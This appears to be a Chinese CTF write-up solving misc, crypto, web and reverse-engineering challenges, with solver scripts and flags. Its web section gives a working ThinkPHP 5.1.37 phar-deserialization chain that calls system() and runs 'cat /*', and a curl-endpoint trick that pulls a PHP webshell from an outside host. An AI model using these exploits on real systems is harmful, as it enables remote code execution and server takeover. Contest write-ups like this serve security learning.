Misc
应该算是签到
文章图片
B站搜索直接搜索这个BV号
文章图片
PS:出题人品味不错,我也喜欢酷玩的这首《Yellow》
直接页面Ctrl+F没找出来
搜索引擎找一下有没有通过API查弹幕的方法:https://www.bilibili.com/read/cv7923601
文章图片
F12点击Network,找到这个视频的cid
文章图片
从当前时间2021-11-27开始往前找
https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=400438565&date=2021-11-27
将历史弹幕文件下载下来,选择
UTF-8编码,然后查找关键字即可
文章图片
D0g3{We1come_to_axbg0g0g0}
CyzCC_loves_LOL
文章图片
D0g3_LOLteampasswordHAI D0g3 code
I HAS A CODE ITZ "D0g3isthepAssword"
I HAS A MSG ITZ ""
I HAS A COUNTER ITZ 0
I HAS A NUM
IM IN YR LOOP UPPIN YR COUNTER WILE COUNTER SMALLR THAN LEN OF CODE
I HAS A C ITZ CODE!COUNTER
NUM R ORD OF C
NUM R SUM OF NUM AN -3
IZ NUM SMALLR THAN 65?, NUM R SUM OF NUM AN 26, KTHX
NUM R CHR OF NUM
MSG R SMOOSH MSG AN NUM
IM OUTTA YR LOOP
VISIBLE MSG
KTHXBYE
看不懂什么东西,猜测某种编码,搜索引擎找一下
文章图片
- lolcode-language:https://www.dcode.fr/lolcode-language
ez_misc.zip密码:AGdJfpqebmXpptloa
文章图片
文章图片
Program.png根据名称提示一开始以为是npiet,尝试直接编译发现不对
文章图片
后来经过查阅资料才发现
Brainfuck也有一种用像素颜色表示的语言:Brainloller- https://minond.xyz/brainloller/
Play,得到密码:0MTTW CWZVN!
文章图片
然后根据题目名称提示将密码中的空格换成下划线、以及
jinx's_flag_in_silent.jpg的名称,直接尝试SilentEye解密
文章图片
D0g3{544f3225-bbaf-47dc-ba8d-5bda54cbaecb}
Cthulhu Mythos
下载附件,发现是里面是一个
hint.mp3 和The Evil Watcher.wld
文章图片
hint.mp3听一下,发现前面是泰拉瑞亚的主题曲,后面部分很明显是SSTV
文章图片
因为格式问题没法直接用
QSSTV,RX-SSTV的话又比较麻烦要调整电脑录音设备,就直接用Robot36听吧网上随便找个地址:https://apkpure.com/cn/robot36-sstv-image-decoder/xdsopl.robot36
文章图片
文章图片
得到后半部分的flag:
d_Try_Terr4ria!}The Evil Watcher.wld文件是Terraria游戏的一个地图文件,我们可以通过Terramap地图查看器去加载这个地图文件Terramap链接:https://www.bilibili.com/read/cv8778447/
等加载完地图,Players:选择All Spoiers,这样地图就全部显现出来了,可以通过左键拖动地图,右键可以查看相关物品信息
文章图片
在地图中发现了四个蓝色突起状的东西,右键点击发现了类似base编码的东西
文章图片
文章图片
文章图片
第四个箱子说密文被机械师拿走了
文章图片
讲前三个箱子的base编码组合一下,得到base32编码
IQYGOM33JUYW4ZLDKI2GM5C
用
CyberChef解码一下得到前半部分的D0g3{M1necR4ft,但是跟后半部分是连不上的,我们再去看看第四个箱子里面被拿走的密文是什么
文章图片
最后一个箱子的密文始终没有找到,在尝试了多个编辑器后,终于使用
Tedit在出生地发现了最后的密文,不知道为啥有的编辑器不显示,有的编辑器又会显示。。。Tedit下载地址:https://www.binaryconstruct.com/downloads/
文章图片
得到
7I4YF6QLO,所以完整的前半部分的base32编码就是IQYGOM33JUYW4ZLDKI2GM5C7I4YF6QLO
文章图片
得到
D0g3{M1necR4ft_G0_An,所以结合前面的后半部分flag:d_Try_Terr4ria!}所以flag为:
D0g3{M1necR4ft_G0_And_Try_Terr4ria!}
lovemath
打开压缩包,里面除了flag.zip,还有几个 大小只有6的txt文件,这里应该是要crc32爆破了
文章图片
使用命令:
python crc32.py reverse 0xCRC32的值
分别得到:
文章图片
文章图片
文章图片
文章图片
文章图片
连起来就是:
th1s_Is_Y0ur_pa33w0rd_We1c0m3e打开flag.zip得到
文章图片
文章图片
用Stegsolve打开图片,发现R,G,B的0通道都有异常
文章图片
应该是LSB隐写没跑了
文章图片
我们将其Save Bin,保存为png图片,发现打不开,用010打开发现文件头前面有多余的字节,删掉后可打开得到一张带有很多数字的图片
文章图片
因为没法复制,手撸的话估计眼睛要瞎了,尝试用QQ识图来获取数据,但是全部选中识别又有误差,于是选了个折中的办法就是半行半行的用QQ识图。。。总算是识别完了,遭不住,眼睛痛
1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352
尝试过转字符,但是失败了哈哈哈哈,果然作为500分的题肯定没这么简单,根据题目,
lovemath和数学如此美丽,甚至能画出自己来看,这题应该是要通过某种数学方式来绘图,并且注意这句甚至能画出自己,最后百度了很久,终于在百度自我画图公式的结果中,发现了塔伯自我指涉公式作图程序(matplotlib),里面还附有脚本脚本地址:https://www.cnblogs.com/1024th/p/14418846.html
文章图片
脚本如下:
"""
Plot Tupper's self-referential formula
"""
import textwrap
import matplotlib.pyplot as pltK = 1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352H = 17
W = 106if __name__ == "__main__":
plt.figure(figsize=(6.8, 4), dpi=600)
plt.axis("scaled")K_ = K//17
for x in range(W):
for y in range(H):
if K_ & 1:
plt.bar(x+0.5, bottom=y, height=1,
width=1, linewidth=0, color="black")
K_ >>= 1plt.figtext(0.5, 0.8, r"$\frac{1}{2}<\left\lfloor \operatorname{mod}\left(\left\lfloor\frac{y}{%d}\right\rfloor 2^{-%d\lfloor x\rfloor-\operatorname{mod}(\lfloor y\rfloor, %d)}, 2\right)\right\rfloor$" % (H, H, H), ha="center", va="bottom", fontsize=18)
plt.subplots_adjust(top=0.8, bottom=0.5)
K_str = textwrap.wrap(str(K), 68)
K_str[0] = f"K={K_str[0]}"
for i in range(1, len(K_str)):
K_str[i] = f"{K_str[i]}".ljust(70)
K_str = "\n".join(K_str)
plt.figtext(0.5, 0.45, K_str, fontfamily="monospace", ha="center", va="top")plt.xlim((0, W))
plt.ylim((0, H))
xticks = list(range(0, W+1))
xlabels = ["" for i in xticks]
xlabels[0] = "0"
xlabels[-1] = str(W)
plt.xticks(xticks, xlabels)
yticks = list(range(0, H+1))
ylabels = ["" for i in yticks]
ylabels[0] = "K"
ylabels[-1] = f"K+{H}"
plt.yticks(yticks, ylabels)
plt.grid(b=True, linewidth=0.5)# plt.show()
plt.savefig("Tupper-plot.png")
# plt.savefig(fname="name", format="svg")
把之前得到的数据填入
K之后运行,得到Tupper-plot.png
文章图片
得到flag为:
D0g3{I_Lov3_math}
Cry little_trick
注意到e的生成:
e = g m p y 2. n e x t ? p r i m e ( b y t e s ? t o ? l o n g ( o s . u r a n d o m ( 3 ) ) ) e = gmpy2.next-prime(bytes-to-long(os.urandom(3))) e=gmpy2.next?prime(bytes?to?long(os.urandom(3)))
由此可知e的取值较小,可以爆破出来,大致估计e的范围:e<256 * 256 * 150+256 * 150 +150=9868950,于是设置e的上界为e<10000000.
直接爆破e时间可能太久,我们采取空间换时间的方法:先把这个范围内的素数全求出来,存在一个列表里面,然后对列表索引爆破,判断依据为b’D0g3’。
exp
import sympy
from gmpy2 import *
from Crypto.Util.number import *
p=119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431
q=125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741
c=10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032
e=2
phi=(p-1)*(q-1)
n=p*q
l=[2]
while e<10000000:
e=sympy.nextprime(e)
l.append(e)
for e in l:
if gcd(e,phi)!=1:
continue
d=invert(e,phi)
m=long_to_bytes(pow(c,d,n))
if b'D0g3' in m:
print(m)
break运行大概十几二十分钟可得结果。
flag为:
D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}
ez_equation
设primelist中的三个素数分别为p1,p2,p3,则有M1=y1+x2+x3= p 2 ( p 1 + 1 ) ( p 1 + p 2 ) p_2(p_1+1)(p_1+p_2) p2?(p1?+1)(p1?+p2?),M2=y2+y3= p 2 ( p 3 + 1 ) ( p 1 + p 2 ) ? 2 p_2(p_3+1)(p_1+p_2)-2 p2?(p3?+1)(p1?+p2?)?2,于是M3=M2+2= p 2 ( p 3 + 1 ) ( p 1 + p 2 ) p_2(p_3+1)(p_1+p_2) p2?(p3?+1)(p1?+p2?),对M1和M3求gcd可得 p 2 ? ( p 1 + p 2 ) ? g c d ( p 1 + 1 , p 3 + 1 ) p_2*(p_1+p_2)*gcd(p_1+1,p_3+1) p2??(p1?+p2?)?gcd(p1?+1,p3?+1),我们在1000的范围内爆破 g c d ( p 1 + 1 , p 3 + 1 ) gcd(p_1+1,p_3+1) gcd(p1?+1,p3?+1),即可求得p1,p2,p3,后面由于p,q很近,枚举p-q分解n,正常解密即可。
exp
import sympy
from gmpy2 import *
from Crypto.Util.number import *
def solve(a,b,c):
delta=b*b-4*a*c
if delta<0:
return (0,0)
delta=isqrt(delta)
if (-b+delta)%(2*a)!=0 or (-b-delta)%(2*a)!=0:
return (0,0)
return ((-b+delta)//(2*a),(-b-delta)//(2*a))M1=3826382835023788442651551584905620963555468828948525089808250303867245240492543151274589993810948153358311949129889992078565218014437985797623260774173862776314394305207460929010448541919151371739763413408901958357439883687812941802749556269540959238015960789123081724913563415951118911225765239358145144847672813272304000303248185912184454183649550881987218183213383170287341491817813853157303415010621029153827654424674781799037821018845093480149146846916972070471616774326658992874624717335369963316741346596692937873980736392272357429717437248731018333011776098084532729315221881922688633390593220647682367272566275381196597702434911557385351389179790132595840157110385379375472525985874178185477024824406364732573663044243615168471526446290952781887679180315888377262181547383953231277148364854782145192348432075591465309521454441382119502677245090726728912738123512316475762664749771002090738886940569852252159994522316M2=4046011043117694641224946060698160981194371746049558443191995592417947642909277226440465640195903524402898673255622570650810338780358645872293473212692240675287998097280715739093285167811740252792986119669348108850168574423371861266994630851360381835920384979279568937740516573412510564312439718402689547377548575653450519989914218115265842158616123026997554651983837361028152010675551489190669776458201696937427188572741833635865019931327548900804323792893273443467251902886636756173665823644958563664967475910962085867559357008073496875191391847757991101189003154422578662820049387899402383235828011830444034463049749668906583814229827321704450021715601349950406035896249429068630164092309047645766216852109121662629835574752784717997655595307873219503797996696389945782836994848995124776375146245061787647756704605043856735398002012276311781956668212776588970619658063515356931386886871554860891089498456646036630114620806#t=gcd(M1,M2+2),m1=M1//t,m2=(M2+2)//tt=195589523630445818529902860956832796890855251392633128505267360019379766078441039447714629517705654989596005641784168486211312686680455807626431626165080866039191378864985968731741426496463223663496416166582452161079104234385985738660388414139911168334469051423205629829765572078313431736483728155228814915764228990643229252394940446647628166159386129345355060753013764486772721947063419319730756920046220488674399534007795610790140941688361870003545561101950379051252306239620980393842817770270164660348572241648029661122045865707023959462688020516797465334280134572790507613563583907925334439091301297527252508403124
m1=19563332248068151535630981329078704836011877594400641639369459141215900260861025312054906757599794566083208720855569882795966368648050841796097774666530924861861072322505359934227960441733030841677273935286749895660385076617500078541482883261409708629757597729348593181573750624736984373186183627343721574559
m2=20686235990647329610791853921718735187994958766092474204131359561885208246097905843101029093347765900355157072072179547621235081101156100572779845352580259426625670629461859798011004868747162865241652060762059495558269934939075323522904748472063800026320062177474213759817229716245635847559587261121068310442
for i in range(2,1000,2):
t1=i*m1-1
t2=i*m2-1
if sympy.isprime(t1):
break#gcd=6,t1=117379993488408909213785887974472229016071265566403849836216754847295401565166151872329440545598767396499252325133419296775798211888305050776586647999185549171166433935032159605367762650398185050063643611720499373962310459705000471248897299568458251778545586376091559089442503748421906239117101764062329447353,t2=124117415943883977664751123530312411127969752596554845224788157371311249476587435058606174560086595402130942432433077285727410486606936603436679072115481556559754023776771158788066029212482977191449912364572356973349619609634451941137428490832382800157920373064845282558903378297473815085357523566726409862651
c=1394946766416873131554934453357121730676319808212515786127918041980606746238793432614766163520054818740952818682474896886923871330780883504028665380422608364542618561981233050210507202948882989763960702612116316321009210541932155301216511791505114282546592978453573529725958321827768703566503841883490535620591951871638499011781864202874525798224508022092610499899166738864346749753379399602574550324310119667774229645827773608873832795828636770263111832990012205276425559363977526114225540962861740929659841165039419904164961095126757294762709194552018890937638480126740196955840656602020193044969685334441405413154601311657668298101837066325231888411018908300828382192203062405287670490877283269761047853117971492197659115995537837080400730294215778540754482680476723953659085854297184575548489544772248049479632420289954409052781880871933713121875562554234841599323223793407272634167421053493995795570508435905280269774274084603687516219837730100396191746101622725880529896250904142333391598426588238082485305372659584052445556638990497626342509620305749829144158797491411816819447836265318302080212452925144191536031249404138978886262136129250971366841779218675482632242265233134997115987510292911606736878578493796260507458773824689843424248233282828057027197528977864826149756573867022173521177021297886987799897923182290515542397534652789013340264587028424629766689059507844211910072808286250914059983957934670979551428204569782238857331272372035625901349763799005621577332502957693517473861726359829588419409120076625939502382579605
n=19445950132976386911852381666731799463510958712950274248183192405937223343228119407660772413067599252710235310402278345391806863116119010697766434743302798644091220730819441599784039955347398797545219314925103529062092963912855489464914723588833817280786158985269401131919618320866942737291915603551320163001129725430205164159721810319128999027215168063922977994735609079166656264150778896809813972275824980250733628895449444386265971986881443278517689428198251426557591256226431727934365277683559038777220498839443423272238231659356498088824520980466482528835994554892785108805290209163646408594682458644235664198690503128767557430026565606308422630014285982847395405342842694189025641950775231191537369161140012412147734635114986068452144499789367187760595537610501700993916441274609074477086105160306134590864545056872161818418667370690945602050639825453927168529154141097668382830717867158189131567590506561475774252148991615602388725559184925467487450078068863876285937273896246520621965096127440332607637290032226601266371916124456122172418136550577512664185685633131801385265781677598863031205194151992390159339130895897510277714768645984660240750580001372772665297920679701044966607241859495087319998825474727920273063120701389749480852403561022063673222963354420556267045325208933815212625081478538158049144348626000996650436898760300563194390820694376019146835381357141426987786643471325943646758131021529659151319632425988111406974492951170237774415667909612730440407365124264956213064305556185423432341935847320496716090528514947
e=65537
p1=t1
p3=t2
term=t//6
p2,P2=solve(1,p1,-term)
pq=n//(p1*p2*p3)
k=2
while 1:
cha=k
he=(pq+cha*cha//4)*4
if iroot(he,2)[1]==True:
he=iroot(he,2)[0]
break
k+=2
p,q=solve(1,-he,pq)
phi=(p-1)*(q-1)*(p1-1)*(p2-1)*(p3-1)
d=invert(e,phi)
m=long_to_bytes(pow(c,d,n))
print(m[256:256+42])
flag:为
D0g3{296b680c-7aeb-5272-8b33-7335b411fbcb}
strange
注意到m是flag,相对于hint和n来说都比较小,m|hint的操作对于hint来说影响很小,这就存在一个小值根,因此采用coppersmith的方法先解出m1,然后根据m1和m2先预估出m的位数,再爆破m的每一位来得到flag。
exp:
##sagemath
n=13002904520196087913175026378157676218772224961198751789793139372975952998874109513709715017379230449514880674554473551508221946249854541352973100832075633211148140972925579736088058214014993082226530875284219933922497736077346225464349174819075866774069797318066487496627589111652333814065053663974480486379799102403118744672956634588445292675676671957278976483815342400168310432107890845293789670795394151784569722676109573685451673961309951157399183944789163591809561790491021872748674809148737825709985578568373545210653290368264452963080533949168735319775945818152681754882108865201849467932032981615400210529003
c=8560367979088389639093355670052955344968008917787780010833158290316540154791612927595480968370338549837249823871244436946889198677945456273317343886485741297260557172704718731809632734567349815338988169177983222118718585249696953103962537942023413748690596354436063345873831550109098151014332237310265412976776977183110431262893144552042116871747127301026195142320678244525719655551498368460837394436842924713450715998795899172774573341189660227254331656916960984157772527015479797004423165812493802730996272276613362505737536007284308929288293814697988968407777480072409184261544708820877153825470988634588666018802
h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144
Zmod=Zmod(n)
P.=PolynomialRing(Zmod)
f=(h+x)^3-c
x0=f.small_roots(X=2^400,beta=0.5)
print(x0)
m1=x0+h
print(m1)
##python
from Crypto.Util.number import *
h=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210307698279022584862990749963452589922185709026197210591472680780996507882639014068600165049839680108974873361895144
m1=9989639419782222444529129951526723618831672627603783728728767345257941311870269471651907118545783408295856954214259681421943807855554571179619485975143945972545328763519931371552573980829950864711586524281634114102102055299443001677757487698347910133933036008103313525651192020921231290560979831996376634906893793239834172305304964022881699764957699708192080739949462316844091240219351646138447816969994625883377800662643645172691649337353080140418336425506119542396319376821324619330083174008060351210933049560781360717427446713646109570038056138652803756149233612618692820860571507613112565167824369560313209417725
m2=9869907877594701353175281930839281485694004896356038595955883788511764488228640164047958227861871572990960024485992
m=''
m1=bin(m1)[2:]
m1=m1[::-1]
h=bin(h)[2:]
h=h[::-1]
m2=bin(m2)[2:]
m2=m2[::-1]
m2+='00000'
bit=[0,1]
for i in range(383):
for j in bit:
if j|int(h[i])==int(m1[i]) and j&int(h[i])==int(m2[i]):
m+=str(j)
print(m[::-1])
print(int(m[::-1],2))
print(long_to_bytes(int(m[::-1],2)))
flag为:
D0g3{R54_f4l1_1n_l0ve_with_CopperSmith_w0wow0!!}
Web ez_tp
扫到www.zip,下载到源码。版本5.1.37,diff了一下发现没有什么不同,直接看源码
文章图片
能读任意文件,但找不到flag位置,不过很明显看出phar反序列化
找链子生成phar文件
files[]=new Pivot();
}
}
}
namespace think{
abstract class Model
{
protected $append = [];
private $data = https://www.it610.com/article/[];
public function __construct(){
$this->data=https://www.it610.com/article/array('feng'=>new Request()
);
$this->append=array(
'feng'=>array(
'hello'=>'world'
)
);
}
}
}
namespace think\model{use think\Model;
class Pivot extends Model
{}
}
namespace think{
class Request
{
protected $hook = [];
protected $filter;
protected $config = [
// 表单请求类型伪装变量
'var_method'=> '_method',
// 表单ajax伪装变量
'var_ajax'=> '',
// 表单pjax伪装变量
'var_pjax'=> '_pjax',
// PATHINFO变量名 用于兼容模式
'var_pathinfo'=> 's',
// 兼容PATH_INFO获取
'pathinfo_fetch'=> ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
// 默认全局过滤方法 用逗号分隔多个
'default_filter'=> '',
// 域名根,如thinkphp.cn
'url_domain_root'=> '',
// HTTPS代理标识
'https_agent_name' => '',
// IP代理获取标识
'http_agent_ip'=> 'HTTP_X_REAL_IP',
// URL伪静态后缀
'url_html_suffix'=> 'html',
];
public function __construct(){
$this->hook['visible']=[$this,'isAjax'];
$this->filter="system";
}
}
}
namespace{
use think\process\pipes\Windows;
$phar = new Phar("phar3.phar");
//后缀名必须为phar,压缩后的文件名
$phar->startBuffering();
$phar->setStub(" __HALT_COMPILER();
?>");
//设置stub
$o = new Windows();
$phar->setMetadata($o);
//将自定义的meta-data存入manifest
$phar->addFromString("hello.txt", "test");
//test为内容test.txt为要压缩的文件(可以不存在)
//签名自动计算
$phar->stopBuffering();
//echo base64_encode(serialize(new Windows));
}读phar
payload变量覆盖一下
http://1.12.220.15:19274/index.php/index/index/hello?shell=cat /*
world=hello=IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0KJgMAAAEAAAARAAAAAQAAAAAA7wIAAE86Mjc6InRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cyI6MTp7czozNDoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwBmaWxlcyI7YToxOntpOjA7TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjI6e3M6OToiACoAYXBwZW5kIjthOjE6e3M6NDoiZmVuZyI7YToxOntzOjU6ImhlbGxvIjtzOjU6IndvcmxkIjt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NDoiZmVuZyI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo4O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjEwOntzOjEwOiJ2YXJfbWV0aG9kIjtzOjc6Il9tZXRob2QiO3M6ODoidmFyX2FqYXgiO3M6MDoiIjtzOjg6InZhcl9wamF4IjtzOjU6Il9wamF4IjtzOjEyOiJ2YXJfcGF0aGluZm8iO3M6MToicyI7czoxNDoicGF0aGluZm9fZmV0Y2giO2E6Mzp7aTowO3M6MTQ6Ik9SSUdfUEFUSF9JTkZPIjtpOjE7czoxODoiUkVESVJFQ1RfUEFUSF9JTkZPIjtpOjI7czoxMjoiUkVESVJFQ1RfVVJMIjt9czoxNDoiZGVmYXVsdF9maWx0ZXIiO3M6MDoiIjtzOjE1OiJ1cmxfZG9tYWluX3Jvb3QiO3M6MDoiIjtzOjE2OiJodHRwc19hZ2VudF9uYW1lIjtzOjA6IiI7czoxMzoiaHR0cF9hZ2VudF9pcCI7czoxNDoiSFRUUF9YX1JFQUxfSVAiO3M6MTU6InVybF9odG1sX3N1ZmZpeCI7czo0OiJodG1sIjt9fX19fX0JAAAAaGVsbG8udHh0BAAAAAJnomEEAAAADH5/2LYBAAAAAAAAdGVzdM/lB06QxBmPdCdWlMiCHMEIvsfXAgAAAEdCTUI=%26a=phar://hello.txt
文章图片
ezcms
审到很多前台sql注入,只能时间盲注,总是注到一半环境就崩,崩了之后重开又打不通了。
之后本地测试之后是可以未授权的,所以直接找后台功能,看到一个curl接口。
文章图片
应该是可以远程下载文件的。
前面有
if (isset($_GET['url'])){
$dname=explode("/", $_GET['url']);
// print_r($dname);
if(strpos($dname[2],'sem-cms.cn') !== false){
$url=$_GET['url'];
}else{
echo("");
exit;
}
用/分隔,dname[2]得包含sem-cms.cn,设置php文件名为此即可。
payload
http://81.69.27.32:8888/CxWsbN_AR4/Ant_Curl.php?url=47.101.176.40/shell/sem-cms.cn.php
提示下载失败,但本地测试之后其实是成功的,蚁剑连接
Soft/Zip/sem-cms.cn.php
文章图片
RE virtus
是傀儡进程,先dump出来真正的程序
文章图片
题目要求输入两个内容,一个是key,一个是flag,key的长度是4,flag长度是32
文章图片
使用线程对flag进行加密,算法很简单,就是异或
文章图片
文章图片
文章图片
这里是对key进行运算,再用运算后的结果进行比较
文章图片
Key的加密算法我没看懂,但是Key长度并不长,直接写个脚本爆破,爆破出来key是:_shy
文章图片
剩下的部分就是根据key生成密钥表,然后对flag进行加密,最后进行比较
文章图片
加密算法如下,推出:v3[i ] = sub_401005(*(a2 + 4 * i + 16) ^ v3[i + 3] ^ v3[i + 2] ^ v3[i + 1]) ^ v3[i+4]
文章图片
剩下的就是把4011E0的加密算法抄下来,然后套上面推出来的公式,就能跑出flag
脚本如下:
#include "stdafx.h"
int key[]={
0xcbd6c588, 0x03f17d27, 0x1c18e9cc, 0xfe024db3, 0xd71737eb, 0x7b9b1eab, 0x2776bba4, 0xbd2018c0, 0x356d0553, 0x0c825513, 0xcaaff094, 0x9dfbcba1, 0x7eb6b878, 0x47630f35, 0x4b494bbe, 0x34fd620a,
0x14cf85ef, 0xd754e93a, 0x338b4918, 0xc0846091, 0xd526f236, 0xb9ce1fc7, 0xcb537b6a, 0x25fdd8ea, 0x7221094b, 0xa1f73abf, 0x2473d8cc, 0x8fa4f2f2, 0x1e7cac59, 0xec581806, 0x425d33c3, 0xbeb16ed4,
0xe5c0ca70, 0x02b60624, 0x3011744f, 0xf73a6e51, 0x4e7f6768, 0x774e5b55, 0x5b78657b, 0x6f6f724c, 0xcccccc00, 0x7968735f, 0xcccccc00, 0x0018ff88, 0x00402579, 0x00000001, 0x008e1228, 0x008e1290};
char map[352]={
0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05,
0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62,
0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6,
0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8,
0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35,
0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87,
0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e,
0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1,
0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3,
0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f,
0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51,
0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8,
0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0,
0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84,
0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48};
unsigned int AROL(unsigned i,unsigned bit){
_asm{
mov eax,[ebp+8];
push ecx;
mov ecx,[ebp+0xC];
rol eax,cl;
pop ecx;
leave;
retn;
}
return -1;
}
int __cdecl Rcopy(unsigned int a1, char * a2)
{
int result;
// eax
int i;
// [esp+4Ch] [ebp-4h]for ( i = 0;
i < 4;
++i )
{
a2[i] = a1 >> (24 - 8 * i);
result = i + 1;
}
return result;
}
void __cdecl rev(int a1, char *a2){
a2[0]=(a1&0xFF000000)>>24;
a2[1]=(a1&0xFF0000)>>16;
a2[2]=(a1&0xFF00)>>8;
a2[3]=a1&0xFF;
}
unsigned int EP(unsigned int a1){
int v6=0;
Rcopy(a1,(char*)&v6);
for(int i=0;
i<4;
++i){
unsigned int p=*((unsigned char*)&v6+i);
*((char*)&v6+i)=map[p];
}
rev(v6,(char*)&a1);
return a1^AROL(a1,2)^AROL(a1,10)^AROL(a1,18)^AROL(a1,24);
}
int main(int argc, char* argv[])
{
int a=0;
unsigned int b=0x12345678;
b=EP(b);
unsigned int aim[36]={0};
aim[35]=0xE7A35E0F;
aim[34]=0xFC93FC76;
aim[33]=0x6CFB29E0;
aim[32]=0x162FA567;
int i=0;
for( i=31;
i>=0;
i--){
aim[i]=EP(key[i + 4] ^ aim[i + 3] ^ aim[i + 2] ^ aim[i + 1])^aim[i+4];
}
for(i=0;
i<4;
i++){
rev(aim[i],(char*)&aim[i]);
}
char* t=(char*)aim;
for ( i = 0;
i < 32;
i += 2 )t[i] ^= 6u;
for ( i = 1;
i < 32;
i += 2 )t[i] ^= 7u;
getchar();
return 0;
}mazeee
首先根据提示,可以看到base编码,动态调试发现base表被替换,直接换表base解码
文章图片
文章图片
文章图片
得到,D0g3{Y0u^Can=So1ve_it!
然后继续分析迷宫,很容易看出来这是一个三维迷宫,并且可以算出步数应该为22
文章图片
文章图片
脚本如下:
文章图片
文章图片
文章图片
跑出来是:dWWwwdddWWaawwddsssSaw
输入后,告诉我这个。。。。,字符串又说我前面有点问题,what?
文章图片
既然都提醒了是前面,那大概率是下图这段了,不然出题人就疯了
文章图片
文章图片
文章图片
